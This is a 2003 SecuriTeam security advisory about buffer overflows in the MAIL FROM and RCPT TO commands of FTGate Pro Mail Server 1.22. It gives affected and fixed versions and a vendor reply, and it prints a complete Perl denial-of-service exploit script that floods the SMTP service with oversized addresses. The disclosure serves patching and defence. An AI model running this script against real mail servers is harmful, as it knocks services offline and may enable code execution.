[NT] Multiple Buffer Overflow Vulnerabilities found in FTGate Pro Mail Server (MAIL, RCPT)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/03
- Previous message: SecuriTeam: "[NEWS] Intuity Audix Voicemail Restricted Interface Circumvention (rexec)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 12 May 2003 17:31:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Multiple Buffer Overflow Vulnerabilities found in FTGate Pro Mail Server
(MAIL, RCPT)
------------------------------------------------------------------------
SUMMARY
<http://www.Floosietek.com> FTGate Pro is "Floosietek's flagship server.
The comprehensive feature set in this server ensures that it will meet
whatever demands you place on it. This server is powerful enough for the
most demanding of tasks".
Two buffer overflow vulnerabilities in the SMTP service have been found,
causing the service to stop responding for a short period (after which the
service automatically restarts).
DETAILS
Vulnerable systems:
* FTGate Pro Mail Server v. 1.22 (1328)
Immune systems:
* FTGate Pro Mail Server v. 1.22 (HotFix 1330)
When a malicious attacker sends a large address in the "MAIL FROM" and the
"RCPT TO" commands, a buffer is overflowed.
Vendor response:
"Thank you for brining this to my attention. We have fixed the problem
with the code and will release a patch shortly.
Regards
Richard Bang
Floosietek Ltd
richard at ftgate dot com
http://www.floosietek.com"
Exploit:
#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP Server FTGate, causing the service to stop responding for a short
# Period, where we can actually overwrite the exception handler on the
stack
allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Solution:
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
#
#
use IO::Socket;
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x 2400;
my $sock = IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}
print $sock "HELO $target\r\n";
$resp = <$sock>;
print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
ADDITIONAL INFORMATION
The information has been provided by <mailto:der@infowarfare.dk> Dennis
Rand.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Intuity Audix Voicemail Restricted Interface Circumvention (rexec)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
